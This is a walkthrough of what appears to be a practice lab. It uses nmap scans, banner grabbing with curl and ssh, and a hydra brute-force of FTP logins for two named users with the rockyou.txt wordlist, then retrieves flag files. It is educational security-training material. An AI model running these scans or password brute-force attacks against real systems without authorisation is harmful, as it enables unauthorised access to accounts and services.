Task 1
Start Attack Machine + the target.
[Optional] Create ENV variable for IP of target to save time
root@ip-10-10-245-205:~# export ip="10.10.36.158"
root@ip-10-10-245-205:~# echo $ip
10.10.36.158
Task 2
The first three questions can be answered with one nmap scan:
» What is the highest port number being open less than 10,000?
» There is an open port outside the common 1000 ports; it is above 10,000. What is it?
» How many TCP ports are open?
nmap -p- -T5 $ip
-p- scan all ports
-T5 faster/louder scanning
$ip target IP that we declared in Task 1
Result
Host is up (0.00048s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
xx/tcp open ssh
xx/tcp open http
xxx/tcp open netbios-ssn
xxx/tcp open microsoft-ds
xxxx/tcp open http-proxy
xxxxx/tcp open unknown
You can now answer the first three questions.
» What is the flag hidden in the HTTP server header?
There are multiple ways to get the http header flag.
Using curl
curl -I $ip
-I / --head - only fetch the headers
Result
# curl -I $ip
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "229449419"
Last-Modified: Tue, 14 Sep 2021 07:33:09 GMT
Content-Length: 226
Date: Sat, 10 Feb 2024 14:54:59 GMT
Server: lighttpd xxx{xxxxxxxxxxxx}
Side note: not relevant for this lab, but add -L to the command if the target is after a 301 or 302 redirect
Using nmap
nmap -p 80 -A $ip
-p 80 scan only port 80 (webserver)
-A OS and version detection
Result
[...]
PORT STATE SERVICE VERSION
80/tcp open http lighttpd
|_http-server-header: lighttpd xxx{xxxxxxxxxxxx}
|_http-title: Hello, world!
MAC Address: 02:C3:78:16:23:15 (Unknown)
[...]
Using your browser
- Open browser
- open
$iphomepage - open browser dev tools
- navigate to
networktab - refresh page without cache, should be
CTLR+SHIFT+r - click on
200http response of root dir/ - check the
Response Headerssection for the flaglighttpd xxx{xxxxxxxxxxxx}
» What is the flag hidden in the SSH server header?
Using ssh client
ssh -v whatever@$ip
-v verbose output to get the banner/header information
whatever@$ip random username tries to login on target
Result
[...]
debug1: match: OpenSSH_8.2p1 xxx{xxxxxxxxxxxx} pat OpenSSH* compat 0x04000000
[...]
Using nmap
nmap -p 22 -A $ip
-p 22 scan only port 22 (ssh daemon)
-A OS and version detection
Result
[...]
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-OpenSSH_8.2p1 xxx{xxxxxxxxxxxx}
[...]
» We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
So, the first nmap scan showed us all used services but one: the last port over 10000. To get more information about it, we can use nmap yet again.
nmap -A -p 10021 $ip
Result
PORT STATE SERVICE VERSION
10021/tcp open ftp xxxxx x.x.x
[...]
So, we see that a common FTP service is running there and the version, which is our answer.
» We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
To solve this, we need to get access to the FTP server. To brute force our way in, we’ll use hydra and the rockyou.txt password list.
Step 1: If you are not sure where the rockyou.txt is, simply find it with locate:
# locate rockyou.txt
/usr/share/wordlists/rockyou.txt
Step 2: Create a new file usernames.txt with quinn and eddie with each name in a single line. Use your favorite editor or …
printf %"s\n" eddie quinn > usernames.txt
printf similiar to echo, but more consistent
%"s\n" replace space with a line break \n
eddie quinn the user names we were given
> usernames.txt write output to a file
Side note: you can skip this step if you just want to use one user name
Step 3: Use hydra to brute force FTP access for both usernames
hydra -L usernames.txt -P /usr/share/wordlists/rockyou.txt ftp://$ip:10021
Result
[...]
[DATA] attacking ftp://10.10.36.158:10021/
[10021][ftp] host: 10.10.36.158 login: quinn password: ******
[10021][ftp] host: 10.10.36.158 login: eddie password: *****
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-02-10 15:57:04
Success!
Step 4: Log into the FTP server with credentials and retreive flag file.
ftp $ip 10021 Log on
Insert username and password and check with ls if the flag is there.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1002 1002 18 Sep 20 2021 ftp_flag.txt
226 Directory send OK.
Now use get ftp_flag.txt to download the file to the host machine:
ftp> get ftp_flag.txt
local: ftp_flag.txt remote: ftp_flag.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).
226 Transfer complete.
18 bytes received in 0.00 secs (7.7403 kB/s)
Use exit to disconnect from the FTP server and show the content of the flag file:
cat ftp_flag.txt
xxx{xxxxxxxxxxxx}
Done.
» Browsing to http://10.10.36.158:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
This flag is a little bit weird. What am I supposed to check or scan? Every scan failed, so I had to look it up and the answer seems to be a simple nmap scan with the -sN flag.
- Open page on port
8080 - Reset the packet count with the button
- start
nmap -sN $ip(which is a TCP Null scan) - Flag will show on the page
Exercise Complete! Task answer: xxx{xxxxxxxxxxxx}
Most recent Articles: